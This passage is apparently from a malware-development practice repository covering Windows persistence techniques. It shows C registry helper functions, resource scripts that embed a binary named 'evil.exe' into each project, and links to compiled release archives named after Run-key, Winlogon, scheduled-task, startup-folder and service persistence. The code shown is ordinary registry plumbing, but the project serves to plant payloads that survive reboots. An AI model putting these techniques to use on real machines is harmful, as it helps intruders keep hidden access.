28 |
29 |
30 | Header Files
31 |
32 |
33 |
34 |
35 | Resource Files
36 |
37 |
38 |
39 |
40 |
41 |
--------------------------------------------------------------------------------
/simple-persistence/image-file-execution-options/image-file-execution-options.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/simple-persistence/image-file-execution-options/registry.h:
--------------------------------------------------------------------------------
#pragma once
/* NOTE(review): the three include targets below were lost in this listing
 * (angle-bracket names stripped); the declarations need the Win32 registry
 * API headers. */
#include
#include
#include
#pragma comment(lib, "AdvAPI32.Lib")

/* Buffer sizing constants, in bytes, for ReadStringFromRegistry
 * (initial allocation and growth step, presumably — confirm in registry.c). */
#define TOTAL_BYTES_READ 1024
#define OFFSET_BYTES 1024

/* Thin wrappers over the Win32 registry API. Each returns TRUE on success
 * and FALSE on failure; `subkey` and `valueName` are NUL-terminated wide
 * strings, `subkey` relative to hKeyParent. */

/* Create `subkey` under hKeyParent, or open it if it already exists. */
BOOL CreateRegistryKey(HKEY hKeyParent, PWCHAR subkey);
/* Write `data` as a DWORD value of an existing key. */
BOOL WriteDwordToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD data);
/* Write the wide string `strData` as a string value of an existing key. */
BOOL WriteStringToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR strData);
/* Read a DWORD value into *readData. */
BOOL ReadDwordFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD* readData);
/* Read a string value into a heap buffer stored in *readData; the caller
 * releases it with free(). */
BOOL ReadStringFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR* readData);
--------------------------------------------------------------------------------
/simple-persistence/image-file-execution-options/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by image-file-execution-options.rc
4 | //
5 | #define IDR_BIN1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/simple-persistence/release/x64/appinit-dlls.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/release/x64/appinit-dlls.zip
--------------------------------------------------------------------------------
/simple-persistence/release/x64/image-file-execution-options.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/release/x64/image-file-execution-options.zip
--------------------------------------------------------------------------------
/simple-persistence/release/x64/run-registry.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/release/x64/run-registry.zip
--------------------------------------------------------------------------------
/simple-persistence/release/x64/scheduled-task.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/release/x64/scheduled-task.zip
--------------------------------------------------------------------------------
/simple-persistence/release/x64/startup-folder.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/release/x64/startup-folder.zip
--------------------------------------------------------------------------------
/simple-persistence/release/x64/windows-service.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/release/x64/windows-service.zip
--------------------------------------------------------------------------------
/simple-persistence/release/x64/winlogon-registry.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/release/x64/winlogon-registry.zip
--------------------------------------------------------------------------------
/simple-persistence/run-registry/bin/evil.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/run-registry/bin/evil.exe
--------------------------------------------------------------------------------
/simple-persistence/run-registry/registry.c:
--------------------------------------------------------------------------------
1 | #include "registry.h"
2 |
3 | /*
4 | * Example usage (the calls below use older function names and narrow string literals; the declared API in registry.h takes PWCHAR, so use L"..." literals):
5 | BOOL status;
6 | DWORD readData;
7 | PWCHAR readMessage = nullptr;
8 |
9 | status = CreateRegistryKey(HKEY_CURRENT_USER, "Aticleworld"); //create key
10 | if (status != TRUE) return FALSE;
11 |
12 | status = WriteDwordInRegistry(HKEY_CURRENT_USER, "Aticleworld","date",12082016); //write dword
13 | if (status != TRUE) return FALSE;
14 |
15 | status = readDwordValueRegistry(HKEY_CURRENT_USER, "Aticleworld", "date", &readData); //read dword
16 | if (status != TRUE) return FALSE;
17 | printf("%ld", readData);
18 |
19 | status = writeStringInRegistry(HKEY_CURRENT_USER, "Aticleworld", "Message", "Happy"); //write string
20 | if (status != TRUE) return FALSE;
21 |
22 | status = readUserInfoFromRegistry(HKEY_CURRENT_USER, "Aticleworld", "Message", &readMessage); //read string
23 | if (status != TRUE) return FALSE;
24 | if (readMessage != nullptr) {
25 | printf(" Message = %S\n", readMessage);
26 | free(readMessage);
27 | readMessage = nullptr;
28 | }
29 | */
30 |
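/*
 * Create the subkey `subkey` under `hKeyParent`, or open it if it already
 * exists, then release the handle again.
 *
 * hKeyParent: an open parent key (e.g. HKEY_CURRENT_USER).
 * subkey:     NUL-terminated wide key path relative to hKeyParent.
 * Returns TRUE when the key exists on return, FALSE on any failure.
 *
 * The key is created REG_OPTION_NON_VOLATILE, i.e. it persists across
 * reboots. Whether it was created or merely opened is not reported.
 */
BOOL CreateRegistryKey(HKEY hKeyParent, PWCHAR subkey)
{
    HKEY hKey = NULL;
    DWORD dwDisposition = 0; /* REG_CREATED_NEW_KEY or REG_OPENED_EXISTING_KEY; unused */
    LONG status;

    if (subkey == NULL)
        return FALSE;

    /* The handle is closed immediately, so only the rights needed to create
     * the key are requested (KEY_WRITE is a strict subset of KEY_ALL_ACCESS,
     * so this succeeds wherever the broader request would have). */
    status = RegCreateKeyExW(hKeyParent, subkey, 0, NULL, REG_OPTION_NON_VOLATILE,
                             KEY_WRITE, NULL, &hKey, &dwDisposition);
    if (status != ERROR_SUCCESS) {
        /* Reg* functions return the Win32 error code directly and do not set
         * the thread's last-error value, so report `status`, not GetLastError(). */
        printf(" [-] Error Opening or Creating new key. Code = %ld\n", (long)status);
        return FALSE;
    }

    RegCloseKey(hKey);
    return TRUE;
}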
46 |
/*
 * Store `data` as a REG_DWORD value named `valueName` under
 * hKeyParent\subkey. The key must already exist (see CreateRegistryKey);
 * it is opened with KEY_WRITE and closed before returning.
 *
 * Returns TRUE when the value was written, FALSE if the key could not be
 * opened or the value could not be set.
 */
BOOL WriteDwordToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD data)
{
    HKEY hKey;
    BOOL written;

    if (RegOpenKeyExW(hKeyParent, subkey, 0, KEY_WRITE, &hKey) != ERROR_SUCCESS)
        return FALSE;

    /* sizeof(data) is the 4-byte payload RegSetValueExW expects for REG_DWORD. */
    written = (RegSetValueExW(hKey, valueName, 0, REG_DWORD,
                              (LPBYTE)&data, sizeof(data)) == ERROR_SUCCESS);
    RegCloseKey(hKey);
    return written;
}
65 |
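/*
 * Store the NUL-terminated wide string `strData` as a REG_SZ value named
 * `valueName` under hKeyParent\subkey. The key must already exist.
 *
 * Returns TRUE when the value was written, FALSE if strData is NULL, the
 * key could not be opened, or the value could not be set.
 */
BOOL WriteStringToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR strData)
{
    HKEY hKey;
    DWORD cbData;
    BOOL written;

    if (strData == NULL)
        return FALSE;

    /* REG_SZ data must include the terminating NUL, and the size is in bytes.
     * lstrlenW is used explicitly: plain lstrlen resolves to lstrlenA in a
     * non-UNICODE build and would miscount a wide string. */
    cbData = ((DWORD)lstrlenW(strData) + 1) * sizeof(WCHAR);

    if (RegOpenKeyExW(hKeyParent, subkey, 0, KEY_WRITE, &hKey) != ERROR_SUCCESS)
        return FALSE;

    written = (RegSetValueExW(hKey, valueName, 0, REG_SZ,
                              (LPBYTE)strData, cbData) == ERROR_SUCCESS);
    RegCloseKey(hKey);
    return written;
}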
82 |
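/*
 * Read the REG_DWORD value `valueName` from hKeyParent\subkey into *readData.
 *
 * Returns TRUE and stores the value on success. Returns FALSE, leaving
 * *readData untouched, when readData is NULL, the key cannot be opened, the
 * value is missing, or the stored value is not a 4-byte REG_DWORD.
 */
BOOL ReadDwordFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD* readData)
{
    HKEY hKey = NULL;
    LONG status;
    DWORD value = 0;
    DWORD type = REG_NONE;
    DWORD size = sizeof(value); /* in: bytes available; out: bytes stored */

    if (readData == NULL)
        return FALSE;

    /* Only query rights are needed to read a value. */
    status = RegOpenKeyExW(hKeyParent, subkey, 0, KEY_QUERY_VALUE, &hKey);
    if (status != ERROR_SUCCESS)
        return FALSE;

    status = RegQueryValueExW(hKey, valueName, NULL, &type, (LPBYTE)&value, &size);
    RegCloseKey(hKey);

    /* A failed query must not be reported as success, and anything that is
     * not exactly a DWORD (e.g. a REG_SZ or REG_BINARY value) is rejected so
     * it cannot be misread as a number. */
    if (status != ERROR_SUCCESS || type != REG_DWORD || size != sizeof(value))
        return FALSE;

    *readData = value;
    return TRUE;
}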
105 |
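/*
 * Read the string value `valueName` from hKeyParent\subkey into a newly
 * allocated, NUL-terminated wide-string buffer.
 *
 * On success returns TRUE and stores the buffer in *readData; the caller
 * owns it and must release it with free(). On failure returns FALSE and
 * sets *readData to NULL. Failure cases: readData is NULL, the key cannot
 * be opened, allocation fails, the value is missing, or its type is not
 * REG_SZ / REG_EXPAND_SZ.
 *
 * The buffer starts at TOTAL_BYTES_READ bytes and grows by at least
 * OFFSET_BYTES while RegQueryValueExW reports ERROR_MORE_DATA. One extra
 * WCHAR is always reserved so a terminator can be appended: string data
 * written by other programs is not guaranteed to be NUL-terminated.
 */
BOOL ReadStringFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR* readData)
{
    HKEY hKey = NULL;
    LONG status;
    DWORD type = REG_NONE;
    DWORD capacity = TOTAL_BYTES_READ; /* usable bytes in `buffer` */
    DWORD needed = 0;                  /* in/out byte count for RegQueryValueExW */
    DWORD grownCapacity;
    PWCHAR buffer;
    PWCHAR grown;

    if (readData == NULL)
        return FALSE;
    *readData = NULL;

    /* Open before allocating so a missing key does not cost a malloc/free. */
    status = RegOpenKeyExW(hKeyParent, subkey, 0, KEY_QUERY_VALUE, &hKey);
    if (status != ERROR_SUCCESS)
        return FALSE;

    buffer = (PWCHAR)malloc(capacity + sizeof(WCHAR));
    if (buffer == NULL) {
        RegCloseKey(hKey);
        return FALSE;
    }

    for (;;) {
        needed = capacity;
        status = RegQueryValueExW(hKey, valueName, NULL, &type, (LPBYTE)buffer, &needed);
        if (status != ERROR_MORE_DATA)
            break;

        /* On ERROR_MORE_DATA `needed` holds the value's real size; grow to
         * at least that, and by OFFSET_BYTES at minimum. realloc's result is
         * kept separately so the old buffer is freed if it fails. */
        grownCapacity = capacity + OFFSET_BYTES;
        if (needed > grownCapacity)
            grownCapacity = needed;
        grown = (PWCHAR)realloc(buffer, grownCapacity + sizeof(WCHAR));
        if (grown == NULL) {
            free(buffer);
            RegCloseKey(hKey);
            return FALSE;
        }
        buffer = grown;
        capacity = grownCapacity;
    }
    RegCloseKey(hKey);

    if (status != ERROR_SUCCESS || (type != REG_SZ && type != REG_EXPAND_SZ)) {
        free(buffer);
        return FALSE;
    }

    /* `needed` <= capacity here, and the buffer has capacity + sizeof(WCHAR)
     * bytes, so the terminator index is always in bounds. */
    buffer[needed / sizeof(WCHAR)] = L'\0';
    *readData = buffer;
    return TRUE;
}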
--------------------------------------------------------------------------------
/simple-persistence/run-registry/registry.h:
--------------------------------------------------------------------------------
#pragma once
/* NOTE(review): the three include targets below were lost in this listing
 * (angle-bracket names stripped); registry.c uses the Win32 registry API
 * plus printf and malloc/realloc/free. */
#include
#include
#include
#pragma comment(lib, "AdvAPI32.Lib")

/* Initial buffer size, in bytes, that ReadStringFromRegistry allocates. */
#define TOTAL_BYTES_READ 1024
/* Growth step, in bytes, applied while RegQueryValueExW reports ERROR_MORE_DATA. */
#define OFFSET_BYTES 1024

/* Thin wrappers over the Win32 registry API. Every function returns TRUE on
 * success and FALSE on failure; `subkey` is a NUL-terminated wide key path
 * relative to hKeyParent, `valueName` a NUL-terminated wide value name. */

/* Create `subkey` under hKeyParent (non-volatile) or open it if it exists. */
BOOL CreateRegistryKey(HKEY hKeyParent, PWCHAR subkey);
/* Write `data` as a REG_DWORD value; the key must already exist. */
BOOL WriteDwordToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD data);
/* Write the wide string `strData` (including its terminator) as a REG_SZ value. */
BOOL WriteStringToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR strData);
/* Read a DWORD value into *readData. */
BOOL ReadDwordFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD* readData);
/* Read a string value into a malloc'd buffer stored in *readData; the caller
 * must release it with free(). */
BOOL ReadStringFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR* readData);
--------------------------------------------------------------------------------
/simple-persistence/run-registry/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by run-registry.rc
4 | //
5 | #define IDR_BIN1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/simple-persistence/run-registry/run-registry.aps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/run-registry/run-registry.aps
--------------------------------------------------------------------------------
/simple-persistence/run-registry/run-registry.rc:
--------------------------------------------------------------------------------
1 | // Microsoft Visual C++ generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "winres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // English (United States) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
19 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
20 | #pragma code_page(1252)
21 |
22 | #ifdef APSTUDIO_INVOKED
23 | /////////////////////////////////////////////////////////////////////////////
24 | //
25 | // TEXTINCLUDE
26 | //
27 |
28 | 1 TEXTINCLUDE
29 | BEGIN
30 | "resource.h\0"
31 | END
32 |
33 | 2 TEXTINCLUDE
34 | BEGIN
35 | "#include ""winres.h""\r\n"
36 | "\0"
37 | END
38 |
39 | 3 TEXTINCLUDE
40 | BEGIN
41 | "\r\n"
42 | "\0"
43 | END
44 |
45 | #endif // APSTUDIO_INVOKED
46 |
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 | //
50 | // BIN
51 | //
52 |
53 | IDR_BIN1 BIN "bin\\evil.exe"
54 |
55 | #endif // English (United States) resources
56 | /////////////////////////////////////////////////////////////////////////////
57 |
58 |
59 |
60 | #ifndef APSTUDIO_INVOKED
61 | /////////////////////////////////////////////////////////////////////////////
62 | //
63 | // Generated from the TEXTINCLUDE 3 resource.
64 | //
65 |
66 |
67 | /////////////////////////////////////////////////////////////////////////////
68 | #endif // not APSTUDIO_INVOKED
69 |
70 |
--------------------------------------------------------------------------------
/simple-persistence/run-registry/run-registry.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 |
26 |
27 | Header Files
28 |
29 |
30 | Header Files
31 |
32 |
33 |
34 |
35 | Resource Files
36 |
37 |
38 |
39 |
40 |
41 |
--------------------------------------------------------------------------------
/simple-persistence/run-registry/run-registry.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/simple-persistence/scheduled-task/bin/evil.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/scheduled-task/bin/evil.exe
--------------------------------------------------------------------------------
/simple-persistence/scheduled-task/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by scheduled-task.rc
4 | //
5 | #define IDR_BIN1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/simple-persistence/scheduled-task/scheduled-task.aps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/scheduled-task/scheduled-task.aps
--------------------------------------------------------------------------------
/simple-persistence/scheduled-task/scheduled-task.rc:
--------------------------------------------------------------------------------
1 | // Microsoft Visual C++ generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "winres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // English (United States) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
19 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
20 | #pragma code_page(1252)
21 |
22 | #ifdef APSTUDIO_INVOKED
23 | /////////////////////////////////////////////////////////////////////////////
24 | //
25 | // TEXTINCLUDE
26 | //
27 |
28 | 1 TEXTINCLUDE
29 | BEGIN
30 | "resource.h\0"
31 | END
32 |
33 | 2 TEXTINCLUDE
34 | BEGIN
35 | "#include ""winres.h""\r\n"
36 | "\0"
37 | END
38 |
39 | 3 TEXTINCLUDE
40 | BEGIN
41 | "\r\n"
42 | "\0"
43 | END
44 |
45 | #endif // APSTUDIO_INVOKED
46 |
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 | //
50 | // BIN
51 | //
52 |
53 | IDR_BIN1 BIN "bin\\evil.exe"
54 |
55 | #endif // English (United States) resources
56 | /////////////////////////////////////////////////////////////////////////////
57 |
58 |
59 |
60 | #ifndef APSTUDIO_INVOKED
61 | /////////////////////////////////////////////////////////////////////////////
62 | //
63 | // Generated from the TEXTINCLUDE 3 resource.
64 | //
65 |
66 |
67 | /////////////////////////////////////////////////////////////////////////////
68 | #endif // not APSTUDIO_INVOKED
69 |
70 |
--------------------------------------------------------------------------------
/simple-persistence/scheduled-task/scheduled-task.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Resource Files
30 |
31 |
32 |
33 |
34 |
35 |
--------------------------------------------------------------------------------
/simple-persistence/scheduled-task/scheduled-task.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/simple-persistence/startup-folder/bin/evil.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/startup-folder/bin/evil.exe
--------------------------------------------------------------------------------
/simple-persistence/startup-folder/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by startup-folder.rc
4 | //
5 | #define IDR_BIN1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/simple-persistence/startup-folder/startup-folder.aps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/startup-folder/startup-folder.aps
--------------------------------------------------------------------------------
/simple-persistence/startup-folder/startup-folder.rc:
--------------------------------------------------------------------------------
1 | // Microsoft Visual C++ generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "winres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // English (United States) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
19 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
20 | #pragma code_page(1252)
21 |
22 | #ifdef APSTUDIO_INVOKED
23 | /////////////////////////////////////////////////////////////////////////////
24 | //
25 | // TEXTINCLUDE
26 | //
27 |
28 | 1 TEXTINCLUDE
29 | BEGIN
30 | "resource.h\0"
31 | END
32 |
33 | 2 TEXTINCLUDE
34 | BEGIN
35 | "#include ""winres.h""\r\n"
36 | "\0"
37 | END
38 |
39 | 3 TEXTINCLUDE
40 | BEGIN
41 | "\r\n"
42 | "\0"
43 | END
44 |
45 | #endif // APSTUDIO_INVOKED
46 |
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 | //
50 | // BIN
51 | //
52 |
53 | IDR_BIN1 BIN "bin\\evil.exe"
54 |
55 | #endif // English (United States) resources
56 | /////////////////////////////////////////////////////////////////////////////
57 |
58 |
59 |
60 | #ifndef APSTUDIO_INVOKED
61 | /////////////////////////////////////////////////////////////////////////////
62 | //
63 | // Generated from the TEXTINCLUDE 3 resource.
64 | //
65 |
66 |
67 | /////////////////////////////////////////////////////////////////////////////
68 | #endif // not APSTUDIO_INVOKED
69 |
70 |
--------------------------------------------------------------------------------
/simple-persistence/startup-folder/startup-folder.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Resource Files
30 |
31 |
32 |
33 |
34 |
35 |
--------------------------------------------------------------------------------
/simple-persistence/startup-folder/startup-folder.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/simple-persistence/windows-service/bin/evil-service.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/windows-service/bin/evil-service.exe
--------------------------------------------------------------------------------
/simple-persistence/windows-service/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by windows-service.rc
4 | //
5 | #define IDR_BIN1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/simple-persistence/windows-service/windows-service.aps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/windows-service/windows-service.aps
--------------------------------------------------------------------------------
/simple-persistence/windows-service/windows-service.rc:
--------------------------------------------------------------------------------
1 | // Microsoft Visual C++ generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "winres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // English (United States) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
19 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
20 | #pragma code_page(1252)
21 |
22 | #ifdef APSTUDIO_INVOKED
23 | /////////////////////////////////////////////////////////////////////////////
24 | //
25 | // TEXTINCLUDE
26 | //
27 |
28 | 1 TEXTINCLUDE
29 | BEGIN
30 | "resource.h\0"
31 | END
32 |
33 | 2 TEXTINCLUDE
34 | BEGIN
35 | "#include ""winres.h""\r\n"
36 | "\0"
37 | END
38 |
39 | 3 TEXTINCLUDE
40 | BEGIN
41 | "\r\n"
42 | "\0"
43 | END
44 |
45 | #endif // APSTUDIO_INVOKED
46 |
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 | //
50 | // BIN
51 | //
52 |
53 | IDR_BIN1 BIN "bin\\evil-service.exe"
54 |
55 | #endif // English (United States) resources
56 | /////////////////////////////////////////////////////////////////////////////
57 |
58 |
59 |
60 | #ifndef APSTUDIO_INVOKED
61 | /////////////////////////////////////////////////////////////////////////////
62 | //
63 | // Generated from the TEXTINCLUDE 3 resource.
64 | //
65 |
66 |
67 | /////////////////////////////////////////////////////////////////////////////
68 | #endif // not APSTUDIO_INVOKED
69 |
70 |
--------------------------------------------------------------------------------
/simple-persistence/windows-service/windows-service.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Resource Files
30 |
31 |
32 |
33 |
34 |
35 |
--------------------------------------------------------------------------------
